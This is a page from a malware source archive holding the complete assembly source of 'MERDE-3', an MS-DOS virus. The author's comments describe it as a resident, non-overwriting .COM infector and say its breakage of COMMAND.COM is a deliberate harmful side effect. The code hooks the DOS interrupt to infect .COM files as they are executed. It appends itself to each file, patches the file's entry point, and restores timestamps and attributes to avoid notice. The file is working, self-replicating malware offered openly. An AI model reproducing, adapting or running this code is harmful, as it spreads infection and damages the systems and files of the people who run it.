MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.merde-3.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

405 lines
6.8 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; MERDE-3: A resident, non-overwriting .Com infector by the loki-nator
;Well, here it is, for what it's worth.. It is really kind of a
;piece of crap, but it is just a rough draft..
;NOTES:
; If this gets into Command.Com, it (command) won't work for unknown reasons..
; I could have fixed it by just checking to make sure the file it is infecting
; isn't command.com, but I decided that this would be it's harmful side effect
; and left it... I will have to fix several things in it, like its memory
; handling, etc... It only infects files when they are loaded for EXECUTION!
; it won't infect .com files loaded by debug via AX=4b03, or al=anything
; except 00.... Also, it hooks int 71 for its own type of multiplex
; interrupt to check if the resident portion is already installed..
; I don't know if that will get me in trouble or not. This is not very well
; tested, so it may hand under some circumstances or ill-behaved programs
; that mess with the memory (like I did)... Well, I need to add .exe
; infection, or I will be just a wanna-be virus writer!
; At this very moment, I will probably modify it for infection of any function
; that gives INT 21 a DS:DX pointer to a com file.
; Oh, yeah- If you compile it, you have to run the included Maker.bat file
; after you have compiled it (Use Tasm, but I guess anything will work.)
; Any GOOD virus writers out there will obviously notice how inefficient this
; is, so if you do, leave me mail with some pointers....
compare_val equ 900
interrupt equ 21h
Code_seg Segment Byte
Assume DS:Code_seg, CS:Code_seg
ORG 100h
start: mov di,0100h ;di=start
mov si,bx
add si,offset five_bytes-100h
mov cx,5
rep movsb
int 71h
cmp ax,9999h
jne okay
mov ax,0100h
xor si,si
xor si,di
xor cx,cx
jmp ax
okay: mov di,bx
sub di,100h
xor ax,ax
mov es,ax
mov ax,es:[interrupt*4]
mov bx,es:[interrupt*4+2]
mov [di+int_21_saveo],ax
mov [di+int_21_saves],bx
push cs
pop es
mov [di+orig_stackp],sp
cli
mov sp,di
add sp,offset my_stack
sti
push ax
push bx
push cx
push dx
push bp
push ds
push es
push si
push di
mov [di+my_stack_save],sp
cli
mov sp,[di+orig_stackp]
sti
int 12h
mov bx,cs
mov cx,1024
mul cx
clc
mov cx,400h
sub ax,cx
sbb dx,0000 ;dx:ax=where we want this mem to end!
mov [di+high_ram],dx
mov [di+low_ram],ax
here: mov cx,cs
mov ax,0010h
mul cx
clc
mov cx,di
add cx,offset ending
add ax,cx
adc dx,0000
clc
sub [di+low_ram],ax
sbb [di+high_ram],dx
clc
mov ax,[di+low_ram]
mov dx,[di+high_ram]
mov cx,0010h
div cx ;dx:ax=memory above this-divide it by 16
mov bx,ax
mov ah,4ah
int 21h
jnc okay_1
jmp get_out
okay_1: mov ah,48h
mov bx,60h
int 21h
mov [my_segment+di],ax
jnc okay_2
jmp get_out
okay_2: push di
xor di,di
xor si,si
mov es,ax
mov cx,100h
rep movsb
pop si
push si
add si,100h
mov cx,offset ending-100h
rep movsb
pop di
mov dx,es
sub dx,1
mov es,dx
mov es:[1],ax
mov byte ptr es:[0],'Z'
mov word ptr es:[3],0000
mov es,ax
mov es:[16h],ds
mov ax,offset return_to_file
add ax,di
mov es:[0ah],ax
mov es:[0ch],ds
mov ah,50h
mov bx,es
int 21h
mov dx,600h
mov ax,es
mov ds,ax
mov es,ax
push cs
pop ss
mov word ptr cs:[return_to_file+di+1],di
mov sp,600h
int 27h
return_to_file:
mov di,0000
xor ax,ax
mov es,ax
mov bx,offset my_21
mov ax,cs:[di+my_segment]
mov word ptr es:[interrupt*4],bx
mov word ptr es:[interrupt*4+2],ax
mov word ptr es:[71h*4+2],ax
mov bx,offset my_71
mov word ptr es:[71h*4],bx
mov ax,cs
cli
mov ss,ax
mov sp,cs:[my_stack_save+di]
sti
pop di
pop si
pop es
pop ds
pop bp
pop dx
pop cx
pop bx
pop ax
cli
mov sp,cs:[di+orig_stackp]
sti
mov ax,0100h
jmp ax
get_out:
mov ax,cs
cli
mov ss,ax
mov sp,cs:[di+my_stack_save]
sti
pop di
pop si
pop es
pop ds
pop bp
pop dx
pop cx
pop bx
pop ax
cli
mov sp,cs:[di+orig_stackp]
sti
mov ax,0100h
jmp ax
;------------------------------------------------------------------
my_21:
cmp ah,4bh
je continue_with_it
jmp continue_21
continue_with_it:
cmp al,00
je okay_go
jmp continue_21
okay_go:
push ax
push bx
push cx
push dx
push es
push di
push si
push bp
push es
push ds
check_file:
mov bx,dx
xor si,si
looper:
cmp byte ptr ds:[bx+si],'.'
je check_com
cmp si,35
jle okay5
jmp give_up1
okay5: inc si
jmp looper
check_com:
inc si
cmp byte ptr ds:[bx+si],'c'
je check_for_infection
cmp byte ptr ds:[bx+si],'C'
je check_for_infection
jmp give_up1
check_for_infection:
mov cs:[high_file],ds
mov cs:[low_file],dx
mov ah,50h ;set PSP to ours
push cs
pop bx
call dos_21
mov ah,43h
xor al,al
call dos_21
jnc okay9
jmp give_up
okay9: mov cs:[attrib],cx
mov ah,43h
mov al,1
xor cx,cx
call dos_21
mov ah,3dh
mov al,2
call dos_21
jnc okay10
jmp give_up
okay10: mov cs:[handle],ax
mov bx,ax
mov ah,57h
xor al,al
call dos_21
mov cs:[date],dx
mov cs:[time],cx
mov al,2
mov ah,42h
xor dx,dx
xor cx,cx
call dos_21
jnc okay11
jmp give_up
okay11: cmp dx,0
je okay12
jmp give_up
okay12: mov cs:[file_size],ax
cmp ax,64000
jb contin1
call reset_all
jmp give_up
contin1:
cmp ax,1024
jnb contin2
call reset_all
jmp give_up
contin2:
sub ax,compare_val
mov dx,ax
xor cx,cx
mov ah,42h
xor al,al
mov bx,cs:[handle]
call dos_21
mov ah,3fh
push cs
pop ds
mov dx,offset buffer
mov cx,2
call dos_21
mov ax,word ptr cs:[buffer]
mov bx,word ptr cs:[offset ending-compare_val]
cmp ax,bx
jne infect_it
call reset_all
jmp give_up
infect_it:
xor cx,cx
xor dx,dx
mov bx,cs:[handle]
mov ax,4200h
call dos_21
mov ah,3fh
mov cx,5
push cs
pop ds
mov dx,offset five_bytes
call dos_21
mov ax,4202h
xor cx,cx
xor dx,dx
call dos_21
mov ax,cs:[file_size]
add ax,100h
mov word ptr cs:[jumper+1],ax
mov ah,40h
mov cx,offset ending-100h
mov dx,0100h
call dos_21
xor cx,cx
xor dx,dx
mov ax,4200h
mov bx,cs:[handle]
call dos_21
mov dx,offset jumper
mov ah,40h
mov cx,5
call dos_21
call reset_all
give_up:
mov ah,50h
mov bx,cs:[high_file]
call dos_21
give_up1:
pop ds
pop es
pop bp
pop si
pop di
pop es
pop dx
pop cx
pop bx
pop ax
jmp continue_21
continue_21:
jmp dword ptr cs:[int_21_saveo]
dos_21:
pushf
call dword ptr cs:[int_21_saveo]
ret
reset_all:
mov bx,cs:[handle]
mov cx,cs:[time]
mov dx,cs:[date]
mov ax,5701h
call dos_21
mov ah,3eh
mov bx,cs:[handle]
call dos_21
mov ah,43h
mov al,1
mov cx,cs:[attrib]
mov ds,cs:[high_file]
mov dx,cs:[low_file]
call dos_21
ret
my_71:
mov ax,9999h
iret
dw 44 dup(00)
my_stack:
jumper: mov bx,0000
jmp bx
file_size dw 0000
high_file dw 0000
low_file dw 0000
handle dw 0000
attrib dw 0000
date dw 0000
time dw 0000
int_21_saveo dw 0000
int_21_saves dw 0000
orig_stackp dw 0000
my_stack_save dw 0000
high_ram dw 0000
low_ram dw 0000
my_segment dw 0000
buffer: db 10 dup(00)
five_bytes: db 0cdh,20h,90h,90h,90h
my_little_message_to_the_world:
db 'Scan me, I LIKE IT!!!!-Loki-nator!'
ending:
Code_seg ENDS
END start